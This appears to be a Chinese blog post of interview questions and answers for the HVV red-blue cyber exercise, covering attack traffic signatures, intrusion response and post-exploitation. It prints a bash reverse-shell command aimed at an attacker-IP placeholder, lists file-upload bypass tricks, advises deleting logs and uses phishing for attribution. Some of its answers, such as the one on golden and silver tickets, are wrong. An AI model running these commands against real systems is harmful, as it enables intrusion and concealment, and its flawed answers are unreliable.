2025国家护网HVV高频面试题总结来了04(题目+回答)

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

一、HVV行动面试题分类

根据面试题的内容,我们将其分为以下几类:

  • 漏洞利用与攻击技术

  • 防御与应急响应

  • 工具与流量特征  

  • 内网渗透与横向移动 

  • 溯源与反制 

  • 安全设备与日志分析

  • 权限维持与后渗透

  • 常见漏洞与利用方式 

  • 网络安全基础知识

二、分类解析与答案

漏洞利用与攻击技术

1:shiro的流量特征是什么?

Shiro的流量特征通常包括Cookie中的`rememberMe`字段,攻击者通过构造恶意的序列化数据,利用Shiro的反序列化漏洞进行攻击。常见的攻击流量中会包含`rememberMe`字段,且其值为经过AES加密的恶意序列化数据。

 2:fastjson不出网怎么利用?

当fastjson不出网时,可以通过以下方式利用:

- 将命令执行结果写入静态文件,然后通过其他方式读取。

- 使用DNSLog外带数据。

- 利用Commons-io写文件或植入Webshell。

- 通过BECL攻击导致命令执行或植入内存马。

3:Java内存马如何排查?

Java内存马通常通过Filter、Servlet、Listener等方式植入。

排查思路包括:

- 检查Filter、Servlet、Listener等组件的加载情况。

- 使用工具(如Arthas)动态排查内存中的可疑类。

- 对于冰蝎类型的内存马,可以通过分析JVM内存中的类加载情况,查找可疑的类名或方法。

4:讲下内存⻢排查思路?

- 首先判断是什么方式注入的内存马

- 可以通过查看web日志,以及看是否有类似哥斯拉、冰蝎的流量特征

- 如果web日志中没有发现,那么我们就可以排查中间件的error.log日志

防御与应急响应

1:内网爆出多条异常该怎么处理?

处理内网异常时,应按照以下步骤进行:

-隔离:立即隔离受感染的机器,防止横向扩散。

-分析:分析异常流量的来源和目的,确定攻击类型。

-修复:修复漏洞,清除恶意文件或进程。

- 监控:加强监控,确保攻击已被彻底清除。

2:如何判断文件上传告警是否为真实攻击?  

判断文件上传告警是否为真实攻击的步骤包括:

-分析文件内容:检查上传的文件是否为Webshell或其他恶意文件。

-检查请求来源:分析上传请求的IP地址和User-Agent,判断是否为恶意来源。

-验证漏洞:确认上传功能是否存在漏洞,是否可以被利用。

工具与流量特征

1:CS和MSF的流量特征是什么?

- Cobalt Strike (CS):CS的流量特征包括加密的HTTP/HTTPS通信,常见的URI路径如`/jquery-3.3.1.min.js`,以及Beacon的心跳包。

- Metasploit Framework (MSF):MSF的流量特征包括特定的URI路径(如`/meterpreter/reverse_tcp`),以及Meterpreter的加密通信。

 2:菜刀、蚁剑、冰蝎、哥斯拉的流量特征是什么?

- 蚁剑流量特征主要表现在数据包的加密方式和数据类型。蚁剑使用了AES加密算法对数据进行加密,同时还使用了自定义的二进制协议,在通信中传输各种类型的数据。

- 菜刀流量特征主要表现在HTTP协议上,使用HTTP协议通信,控制命令和数据都通过POST请求传输。因此,可以通过HTTP请求头中的User-Agent、Referer等信息进行识别,eval函数必不可少,有可能会被asser代替。

- 冰蝎流量特征主要表现在数据包中的特殊标记和传输的数据类型。冰蝎的数据包中包含了特定的标记,如"1ag=0x52415631",用于标识该数据包是冰蝎的控制命令。此外,冰蝎还使用了一种自定义的二进制协议,在通信中传输各种类型的数据

- 哥斯拉则流量特征主要表现在数据包的特殊标记和数据类型。哥斯拉的数据包中包含了特定的标记,如"XORHEAD"和"XORBODY",用于标识该数据包是哥斯拉的控制命令。此外,哥斯拉还使用了一种自定义的二进制协议,在通信中传输各种类型的数据。

内网渗透与横向移动

1:内网不出网怎么利用?

当内网不出网时,可以通过以下方式利用:

- SMB协议:利用SMB协议进行横向移动,如通过PsExec、WMI等工具。

- 代理转发:使用工具如frp、ngrok等进行端口转发,将内网服务暴露到外网。

- DNS隧道:通过DNS隧道进行数据传输,绕过网络限制。

2:如何判断二层网络FPP文件落地成功

判断FPP文件是否落地成功可以通过以下方式:

-网络抓包:使用Wireshark等工具抓取网络流量,分析是否有FPP文件的传输。

-日志分析:检查目标系统的日志,查看是否有文件写入的记录。

-文件校验:通过MD5或SHA1校验文件完整性,确认文件是否成功落地。

3:讲下黄金票据和白银票据?

-黄金票据:也称为“域管理员组帐户”,拥有黄金票据的用户可以访问域中所有计算机的本地管理员帐户,能够创建新的域管理员和更改现有的域管理员帐户密码

-白银票据:通常属于本地管理员帐户,只能访问本地计算机并执行特定任务。无法访问其他计算机或管理其他本地管理员帐户

-区别:

黄金票据通常指一个具有域管理员权限的票据,而白银票据通常指普通用户的票据

溯源与反制

1:如何溯源拿到手机号码?

溯源手机号码的步骤包括:

-分析日志:通过分析攻击流量的日志,查找攻击者的IP地址。

-关联信息:通过IP地址关联到攻击者的手机号码或其他个人信息。

-社工手段:通过社工手段(如钓鱼邮件)获取攻击者的手机号码。

2:如何判断SQL注入是否成功?

判断SQL注入是否成功可以通过以下方式:

-回显信息:查看页面是否返回数据库的错误信息或查询结果。

-延时注入:通过延时函数(如`sleep`)判断注入是否成功。

-布尔盲注:通过布尔逻辑判断注入是否成功。

安全设备与日志分析

1. 如何从海量告警中筛选出真实有效的攻击?

筛选真实攻击的步骤包括:

-告警分类:根据告警类型(如SQL注入、文件上传等)进行分类。

-流量分析:分析告警流量的来源、目的和内容,判断是否为恶意流量。

-误报排除:通过规则或人工分析排除误报,如扫描器流量、正常业务流量等。

2:如何分析Web日志?

Web日志分析的关键在于识别异常请求。可以通过分析HTTP状态码、请求频率、请求路径、User-Agent等信息,找出可疑的访问行为。常见的攻击特征包括SQL注入、XSS、文件上传等。

3:常用的渗透测试端口有哪些?

常用的渗透测试端口包括: 

- 22 (SSH)  

- 80 (HTTP)  

- 443 (HTTPS)  

- 445 (SMB)  

- 3389 (RDP)  

- 3306 (MySQL)  

- 8080 (HTTP Alt)

权限维持与后渗透

1:权限维持有哪些方式?

权限维持的常见方式包括:  

- 创建隐藏用户或后门账户  

- 植入Webshell或内存马  

- 利用计划任务或服务持久化  

- 使用黄金票据或白银票据进行Kerberos认证绕过

2:如何反弹Shell?

反弹Shell的常见方法包括使用Netcat、Bash、Python等工具。例如,使用`bash -i >& /dev/tcp/<攻击者IP>/<端口> 0>&1`命令可以将Shell反弹到攻击者的机器上。

3:如何清除渗透后的痕迹?

清除渗透痕迹的步骤包括:

- 删除日志:删除系统日志、Web日志、安全设备日志等。

- 清理文件:删除上传的Webshell、后门文件等。

- 恢复配置:恢复被修改的系统配置、服务配置等。

常见漏洞与利用方式

 1:SQL注入的原理是什么?

SQL注入是通过在用户输入中插入恶意的SQL代码,使得应用程序在执行数据库查询时执行这些恶意代码。攻击者可以通过SQL注入获取数据库中的敏感信息、修改数据、甚至控制整个数据库服务器。

2:文件上传的绕过方式有哪些?

文件上传的绕过方式包括: 

- 修改文件扩展名  

- 使用双扩展名(如`shell.php.jpg`)  

- 修改Content-Type  

- 利用文件头绕过检测  

- 使用空字节截断(如`shell.php%00.jpg`)

3:常见的未授权访问漏洞有哪些?

常见的未授权访问漏洞包括:

- Redis未授权访问:通过未授权访问Redis,获取敏感数据或执行命令。

- MongoDB未授权访问:通过未授权访问MongoDB,获取数据库内容。

- Elasticsearch未授权访问:通过未授权访问Elasticsearch,获取索引数据。

4:文件上传的绕过方式有哪些?

文件上传的绕过方式包括:

- 修改文件扩展名:将恶意文件扩展名改为允许上传的类型(如.jpg改为.php)。

- 修改Content-Type:将请求头中的Content-Type改为允许的类型(如image/jpeg)。

- 双写扩展名:通过双写扩展名绕过检测(如shell.php.jpg)

网络安全基础知识

1:什么是公钥基础设施(PKI)?

公钥基础设施(PKI)是一种基于公钥加密技术的安全框架,用于管理数字证书和公钥。PKI在网络安全中扮演着重要角色,主要用于身份验证、数据加密和数字签名。

2:正向代理和反向代理的区别是什么?

-正向代理:客户端通过代理服务器访问外部资源,代理服务器隐藏客户端的真实IP。 

-反向代理:客户端通过代理服务器访问内部资源,代理服务器隐藏后端服务器的真实IP。

3:HTTP状态码200、302、403、404分别表示什么?

-200 请求成功

-302跳转

-403 权限拒绝

-404 页面资源不存在

其他

1.:您有没有HVV经历?做的什么岗位?

2.:您参与过哪些项目?

3.:您看过哪些安全设备?

......

对于这类问题,如果缺乏实际经验,通常会被归为初级水平(除非在技术上表现特别出色)。因此,在回答时,你要尽可能详尽地展示自己对安全设备的理解,包括与之相关的硬件(HW)知识。同时,强调自己已经为此做了充分的准备,展现出对安全领域的热情和专注。

4:毕业了吗,那平时工作具体工作内容是什么?

已经毕业了;平常在公司,主要负责公司项目渗透测试、应急响应、安全加固、安全培训等工作。

5:平常有挖过src嘛?可以说说你的资产收集过程嘛?

-首先确定我们要挖的公司资产

-使用wps,新建一个exec表格,里面新建好几个表格,备注比如:根域名、子域名、小程序、app以及漏洞提交进度等情况

-上爱企查看这个企业的知识产权,然后看网站备案,然后看这个公司的股权穿透图,这里有一个找边缘资产的好方法,就是看股权穿透图找下面的子公司,但是不同的企业src收录标准不一

-使用小蓝本查该公司的一个小程序、app,然后保存在exec表格里面

-使用oneforall工具进行子域名挖掘,然后保存到一个txt里面,再使用灯塔进行子域名挖掘,再汇总,然后使用无影工具里面的辅助模块进行资产分类

-使用灯塔ARL自动化跑,去找一些文件泄露的漏洞

6:有自己的技术博客嘛,在先知、freebuf等平台发表过文章嘛?

都有,自己一直有保持写技术博文的习惯

7:你学校成绩如何有挂科吗?

学习成绩优秀,没有挂过科;在校期间获得多次校级奖学金以及各种荣誉;或者比赛相关成绩

8:未来你想做安全的哪一个领域?

目前的话还是打算先以贵公司实习为目的,然后以后打算安全的方向的话主要以渗透测试、安服、红蓝攻防这些方向靠。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/981032.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

解锁GPM 2.0「卡顿帧堆栈」|代码示例与实战分析

每个游戏开发者都有一个共同的愿望&#xff0c;那就是能够在无需复现玩家反馈的卡顿现象时&#xff0c;快速且准确地定位卡顿的根本原因。为了实现这一目标&#xff0c;UWA GPM 2.0推出了全新功能 - 卡顿帧堆栈&#xff0c;旨在为开发团队提供高效、精准的卡顿分析工具。在这篇…

【人工智能】蓝耘智算平台盛大发布DeepSeek满血版:开创AI推理体验新纪元

&#x1f4dd;个人主页&#x1f339;&#xff1a;Eternity._ &#x1f339;&#x1f339;期待您的关注 &#x1f339;&#x1f339; ❀ 蓝耘智算平台 蓝耘智算平台核心技术与突破元生代推理引擎快速入门&#xff1a;三步调用大模型接口&#xff0c;OpenAI SDK无缝兼容实战用例文…

用Python+Flask打造可视化武侠人物关系图生成器:从零到一的实战全记录

用PythonFlask打造可视化武侠人物关系图生成器&#xff1a;从零到一的实战全记录 一、缘起&#xff1a;一个程序小白的奇妙探索之旅 作为一个接触Python仅13天的编程萌新&#xff0c;我曾以为开发一个完整的应用是遥不可及的事情。但在DeepSeek的帮助下&#xff0c;我竟用短短…

Mac远程桌面软件哪个好用?

远程桌面软件能帮助我们快速的远程控制另一台电脑&#xff0c;从而提供远程帮助&#xff0c;或者进行远程办公。那么&#xff0c;对macOS系统有什么好用的Mac远程桌面软件呢&#xff1f; 远程看看是一款操作简单、界面简洁的远程桌面软件&#xff0c;支持跨平台操作&#xff0…

华为云 | 快速搭建DeepSeek推理系统

DeepSeek&#xff08;深度求索&#xff09;作为一款国产AI大模型&#xff0c;凭借其高性能、低成本和多模态融合能力&#xff0c;在人工智能领域崛起&#xff0c;并在多个行业中展现出广泛的应用潜力。 如上所示&#xff0c;在华为云解决方案实践中&#xff0c;华为云提供的快速…

Unity 内置渲染管线各个Shader的用途和性能分析,以及如何修改Shader(build in shader 源码下载)

文章目录 所有Shader分析路径&#xff1a;Standard路径&#xff1a;Nature/路径&#xff1a;UI/路径&#xff1a;Particles/Particles/Standard SurfaceParticles/Standard Unlit 路径&#xff1a;Unlit/Unlit/TextureUnlit/ColorUnlit/TransparentUnlit/Transparent CutoutUnl…

概率分布与概率密度

前言 本文隶属于专栏《机器学习数学通关指南》&#xff0c;该专栏为笔者原创&#xff0c;引用请注明来源&#xff0c;不足和错误之处请在评论区帮忙指出&#xff0c;谢谢&#xff01; 本专栏目录结构和参考文献请见《机器学习数学通关指南》 正文 &#x1f50d; 1. 概率分布基…

【C++】类与对象:深入理解默认成员函数

类与对象&#xff1a;深入理解默认成员函数 引言1、默认成员函数概述2、构造函数与析构函数2.1 默认构造函数2.2 析构函数 3、拷贝控制成员3.1 拷贝构造函数3.2 赋值运算符重载 4、移动语义&#xff08;C11&#xff09;4.1 移动构造函数4.2 移动赋值运算符 5、三五法则与最佳实…

LINUX网络基础 - 网络编程套接字,UDP与TCP

目录 前言 一. 端口号的认识 1.1 端口号的作用 二. 初识TCP协议和UDP协议 2.1 TCP协议 TCP的特点 使用场景 2.2 UDP协议 UDP的特点 使用场景 2.3 TCP与UDP的对比 2.4 思考 2.5 总结 三. 网络字节序 3.1 网络字节序的介绍 3.2 网络字节序思考 四. socket接口 …

夸父工具箱(安卓版) 手机超强工具箱

如今&#xff0c;人们的互联网活动日益频繁&#xff0c;导致手机内存即便频繁清理&#xff0c;也会莫名其妙地迅速填满&#xff0c;许多无用的垃圾信息悄然占据空间。那么&#xff0c;如何有效应对这一难题呢&#xff1f;答案就是今天新推出的这款工具软件&#xff0c;它能从根…

Apache nifi demo 实验

Apache nifi 是个数据流系统&#xff0c;可以通过配置 自定义的流程来实现数据的转换。 比如可以配置一个流程&#xff0c;读取数据库里的数据&#xff0c;再转换&#xff0c;最后保存到本地文件。 这样可以来实现一些数据转换的操作&#xff0c;而不用特地编写程序来导入导出。…

VSCode知名主题带毒 安装量900万次

目前微软已经从 Visual Studio Marketplace 中删除非常流行的主题扩展 Material Theme Free 和 Material Theme Icons&#xff0c;微软称这些主题扩展包含恶意代码。 统计显示这些扩展程序的安装总次数近 900 万次&#xff0c;在微软实施删除后现在已安装这些扩展的开发者也会…

Java自动拆箱装箱/实例化顺序/缓存使用/原理/实例

在 Java 编程体系中&#xff0c;基本数据类型与包装类紧密关联&#xff0c;它们各自有着独特的特性和应用场景。理解两者之间的关系&#xff0c;特别是涉及到拆箱与装箱、实例化顺序、区域问题、缓存问题以及效率问题。 一、为什么基本类型需要包装类 泛型与集合的需求 Java…

蓝桥杯复盘记录004(2023)

涉及知识点 1.深搜 2.单调队列滑动窗口 3.位运算 4.并查集 题目 1.lanqiao3505 思路&#xff1a; dfs(index, weight, cnt) index表示瓜的索引&#xff0c; weight等于买瓜的重量&#xff0c; cnt表示买了多少瓜。 递归终止条件&#xff1a;1.如果瓜买完了&#xff0c;归…

【银河麒麟高级服务器操作系统】服务器测试业务耗时问题分析及处理全流程分享

更多银河麒麟操作系统产品及技术讨论&#xff0c;欢迎加入银河麒麟操作系统官方论坛 https://forum.kylinos.cn 了解更多银河麒麟操作系统全新产品&#xff0c;请点击访问 麒麟软件产品专区&#xff1a;https://product.kylinos.cn 开发者专区&#xff1a;https://developer…

【现代深度学习技术】卷积神经网络03:填充和步幅

【作者主页】Francek Chen 【专栏介绍】 ⌈ ⌈ ⌈PyTorch深度学习 ⌋ ⌋ ⌋ 深度学习 (DL, Deep Learning) 特指基于深层神经网络模型和方法的机器学习。它是在统计机器学习、人工神经网络等算法模型基础上&#xff0c;结合当代大数据和大算力的发展而发展出来的。深度学习最重…

FPGA开发,使用Deepseek V3还是R1(3):系统级与RTL级

以下都是Deepseek生成的答案 FPGA开发&#xff0c;使用Deepseek V3还是R1&#xff08;1&#xff09;&#xff1a;应用场景 FPGA开发&#xff0c;使用Deepseek V3还是R1&#xff08;2&#xff09;&#xff1a;V3和R1的区别 FPGA开发&#xff0c;使用Deepseek V3还是R1&#x…

【含文档+PPT+源码】基于SpringBoot和Vue的编程学习系统

项目介绍 本课程演示的是一款 基于SpringBoot和Vue的编程学习系统&#xff0c;主要针对计算机相关专业的正在做毕设的学生与需要项目实战练习的 Java 学习者。 1.包含&#xff1a;项目源码、项目文档、数据库脚本、软件工具等所有资料 2.带你从零开始部署运行本套系统 3.该…

网页复制小妙招

当你遇到网页时不能复制时&#xff0c;不要慌&#xff0c;教你一招可让你为所欲为。 平时你们在网上查找资料想复制时&#xff0c;总是会出现付费限制提示&#xff08;我也是qwq&#xff09;&#xff0c;这时不要慌&#xff0c;在空白处右击选择检查 按开检查&#xff0c;然后…

聆听PostgreSQL数据库的使用

参考&#xff1a;&#xff08;1&#xff09;零基础入门PostgreSQL教程 &#xff08;2&#xff09;菜鸟教程 文章目录 一、PostgreSQL是什么&#xff1f;二、基本使用1.下载2.操作&#xff08;1&#xff09;数据库&#xff08;2&#xff09;表 一、PostgreSQL是什么&#xff1f;…